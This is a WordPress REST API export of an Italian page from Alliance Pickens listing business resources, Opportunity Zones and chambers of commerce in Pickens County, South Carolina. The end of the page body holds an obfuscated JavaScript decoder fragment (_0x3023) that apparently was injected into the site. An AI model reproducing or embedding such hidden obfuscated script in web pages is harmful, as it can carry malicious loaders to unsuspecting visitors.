{"id":6544,"date":"2020-10-28T14:30:28","date_gmt":"2020-10-28T14:30:28","guid":{"rendered":"http:\/\/alliancepickens.com\/risorse-disponibili\/"},"modified":"2020-12-04T20:14:08","modified_gmt":"2020-12-04T20:14:08","slug":"risorse-disponibili","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/","title":{"rendered":"Risorse disponibili"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5109&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Risorse della contea di Pickens<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignright size-full wp-image-10715\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" alt=\"\" width=\"303\" height=\"357\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg 303w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge-255x300.jpg 255w\" sizes=\"auto, (max-width: 303px) 100vw, 303px\" \/>In Alliance Pickens, il nostro obiettivo \u00e8 quello di fornire ai membri della comunit\u00e0 del settore esistente, cos\u00ec come alle aziende che potrebbero essere interessate a saperne di pi\u00f9 su Pickens County, con le informazioni di cui hanno bisogno per prendere decisioni aziendali informate. Se il nostro ufficio pu\u00f2 essere di aiuto per l&#8217;espansione o il trasferimento della tua azienda a Pickens County.South Carolina.USA, contatta <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=13653\">il nostro ufficio.<\/a><\/p>\n<p>L&#8217;Alleanza per lo Sviluppo Economico della Contea di Pickens (Alliance Pickens) \u00e8 potenziata dal governo della Contea di Pickens. Le aziende possono negoziare con la Contea di Pickens per gli incentivi e tutte le linee guida relative alle tasse sono fornite dalla Contea di Pickens o dallo Stato della Carolina del Sud.<\/p>\n<p><span style=\"font-weight: 400\">Il governo della contea di Pickens si impegna a fornire servizi tempestivi, efficienti, cortesi e professionali a tutti i cittadini della contea di Pickens. La contea di Pickens prende decisioni che promuovono gli interessi della comunit\u00e0 pi\u00f9 grande e sviluppano le risorse, le politiche, i piani e le procedure per soddisfare efficacemente le esigenze pubbliche. I funzionari del governo della contea perseguono e supportano quei programmi e progetti che meglio sostengono le priorit\u00e0 del Consiglio della contea di Pickens.<\/span><\/p>\n<p><a class=\"greenbtn\" href=\"https:\/\/www.co.pickens.sc.us\" target=\"_blank\" rel=\"noopener noreferrer\">Ulteriori informazioni<\/a>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_class=&#8221;er&#8221; el_id=&#8221;entrepreneurial_resources&#8221;][vc_column][vc_column_text el_id=&#8221;er&#8221;]<\/p>\n<h2>Risorse imprenditoriali<\/h2>\n<p>Grazie all&#8217;ambiente pro-business di Pickens County.South Carolina.USA, i proprietari di piccole imprese sono in grado di prosperare. Le risorse federali, statali e locali sono disponibili per sostenere gli sforzi dei proprietari di piccole imprese, sia che tu stia appena iniziando la tua attivit\u00e0 o lavorando a un piano che lo aiuter\u00e0 a crescere.[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6553\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sbdc.png\" alt=\"\" width=\"174\" height=\"66\"> <a href=\"https:\/\/www.scsbdc.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ulteriori informazioni<\/a><\/p>\n<p>Nell&#8217;ambito di un accordo di cooperazione con la U.S. Small Business Administration, \u00e8 stato istituito il programma Small Business Development Center (SC SBDC) per aiutare le piccole imprese start-up e per assistere nella continua crescita delle piccole imprese in tutto il paese. Il programma \u00e8 supportato con fondi federali, statali e privati ed \u00e8 aperto a qualsiasi imprenditore presente o potenziale, generalmente gratuito.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6578\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scdoc.png\" alt=\"\" width=\"193\" height=\"57\"> <a href=\"https:\/\/www.sccommerce.com\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ulteriori informazioni<\/a><\/p>\n<p>Il Dipartimento del Commercio DI SC offre una variet\u00e0 o risorse per le piccole imprese inclusa la loro Guida alle risorse aziendali.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6592\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-scbos.png\" alt=\"\" width=\"149\" height=\"50\"> <a href=\"https:\/\/scbos.sc.gov\/\">Ulteriori informazioni<\/a><\/p>\n<p>Il South Carolina Business One Stop o SCBOS \u00e8 il portale web aziendale ufficiale della Carolina del Sud.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6606\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-smbcc.png\" alt=\"\" width=\"167\" height=\"61\"> <a href=\"http:\/\/osmba.sc.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ulteriori informazioni<\/a><\/p>\n<p>Gli obiettivi dell&#8217;Office of Small and Minority Business Assistance (OSMBA) sono di promuovere la crescita e lo sviluppo di piccole imprese di propriet\u00e0 di minoranze nella Carolina del Sud e di sostenere che una parte equa degli appalti pubblici venga aggiudicata alle piccole imprese di propriet\u00e0 di minoranza.[\/vc_column_text][vc_empty_space][vc_column_text]<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-6620\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/logo-sba.png\" alt=\"\" width=\"97\" height=\"103\"> <a href=\"https:\/\/www.sba.gov\/\" target=\"_blank\" rel=\"noopener noreferrer\">Ulteriori informazioni<\/a><\/p>\n<p>La U.S. Small Business Administration (SBA) \u00e8 stata creata nel 1953 come agenzia indipendente del governo federale per aiutare, consigliare, assistere e proteggere gli interessi delle piccole imprese, per preservare la libera impresa competitiva e per mantenere e rafforzare l&#8217;economia complessiva della nostra nazione.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4767&#8243;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;opportunity_zones&#8221;][vc_column][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-5115\" src=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg\" alt=\"\" width=\"482\" height=\"423\" srcset=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2.jpg 482w, https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/opportunityv2-300x263.jpg 300w\" sizes=\"auto, (max-width: 482px) 100vw, 482px\" \/><\/a><\/p>\n<p><a class=\"downloads\" href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Scarica ora<\/a>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2>Aree di opportunit\u00e0<\/h2>\n<p>[\/vc_column_text][vc_column_text]L&#8217;incentivo Opportunity Zone \u00e8 un programma di sviluppo della comunit\u00e0 progettato per incoraggiare investimenti privati a lungo termine in comunit\u00e0 a basso reddito. Questo programma fornisce un incentivo fiscale federale per i contribuenti che reinvestono plusvalenze non realizzati in &#8220;Fondi opportunit\u00e0&#8221;, che sono veicoli specializzati dedicati all&#8217;investimento in aree designate come &#8220;Opportunity Zone&#8221;. Nella contea di Pickens, tre (3) tratti censuari sono stati selezionati come zona opportunit\u00e0.<\/p>\n<p>Per ulteriori dettagli, scaricare il Pickens County <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/Opportunity-Zones-Flyer-Pickens-SC.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><br \/>\n  <strong>Opportunity Zone Flyer<\/strong><br \/>\n<\/a><strong>.<\/strong><\/p>\n<p>Per trovare l&#8217;ufficio locale disponibile e le propriet\u00e0 industriali situate all&#8217;interno di Opportunity Zone, visita le <a href=\"http:\/\/alliancepickens.com\/it\/siti-ed-edifici\/\">nostre pagine Siti ed edifici<\/a> e cerca l&#8217;icona &#8220;Opportunity Zone&#8221;.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_id=&#8221;chambers&#8221;][vc_column][vc_column_text]<\/p>\n<h2 style=\"text-align: center\">Camere di Commercio<\/h2>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10361&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.clemsonareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.clemsonareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Clemson Area<\/strong><br \/>\nCamera di Commercio<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10354&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.easleychamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.easleychamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Grande Easley<\/strong><br \/>\nCamera di Commercio<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10347&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/www.explorepickens.com\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/www.explorepickens.com\/%22\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Picchetto Maggiore<\/strong><br \/>\nCamera di Commercio<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/4&#8243;][vc_single_image image=&#8221;10340&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221; onclick=&#8221;custom_link&#8221; img_link_target=&#8221;_blank&#8221; link=&#8221;https:\/\/libertyareachamber.org\/&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center\"><a href=\"https:\/\/libertyareachamber.org\/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Area Della Libert\u00e0<\/strong><br \/>\nCamera di Commercio<\/a><\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_empty_space][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">Ulteriori informazioni sulle risorse disponibili<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;23&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pronto per iniziare?<\/h1>\n<h3>Non vediamo l&#8217;ora di parlare con voi!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contatta il nostro team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5109&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Risorse della contea di Pickens [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]In Alliance Pickens, il nostro obiettivo \u00e8 quello di fornire ai membri della comunit\u00e0 del settore esistente, cos\u00ec come alle aziende che potrebbero essere interessate a saperne di pi\u00f9 su Pickens County, con&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6544","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Risorse disponibili - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Risorse disponibili - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5109&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Risorse della contea di Pickens [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]In Alliance Pickens, il nostro obiettivo \u00e8 quello di fornire ai membri della comunit\u00e0 del settore esistente, cos\u00ec come alle aziende che potrebbero essere interessate a saperne di pi\u00f9 su Pickens County, con&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:14:08+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/\",\"name\":\"Risorse disponibili - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"datePublished\":\"2020-10-28T14:30:28+00:00\",\"dateModified\":\"2020-12-04T20:14:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/#primaryimage\",\"url\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\",\"contentUrl\":\"http:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/11\\\/pickenscoutybadge.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/risorse-disponibili\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Risorse disponibili\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Risorse disponibili - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/","og_locale":"it_IT","og_type":"article","og_title":"Risorse disponibili - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;pickens_county_resources&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_empty_space height=&#8221;30px&#8221;][vc_single_image image=&#8221;5109&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/resources-avilable\/data-center-population\/&#8221;][vc_empty_space height=&#8221;30px&#8221;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In questa sezione&#8221; nav_menu=&#8221;23&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;pcr&#8221;][vc_column][vc_column_text] Risorse della contea di Pickens [\/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text]In Alliance Pickens, il nostro obiettivo \u00e8 quello di fornire ai membri della comunit\u00e0 del settore esistente, cos\u00ec come alle aziende che potrebbero essere interessate a saperne di pi\u00f9 su Pickens County, con&hellip;","og_url":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:14:08+00:00","og_image":[{"url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/","url":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/","name":"Risorse disponibili - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/#primaryimage"},"thumbnailUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","datePublished":"2020-10-28T14:30:28+00:00","dateModified":"2020-12-04T20:14:08+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/it\/risorse-disponibili\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/#primaryimage","url":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg","contentUrl":"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/pickenscoutybadge.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/it\/risorse-disponibili\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/it\/"},{"@type":"ListItem","position":2,"name":"Risorse disponibili"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/it\/#website","url":"https:\/\/alliancepickens.com\/it\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6544","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/comments?post=6544"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/pages\/6544\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/it\/wp-json\/wp\/v2\/media?parent=6544"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}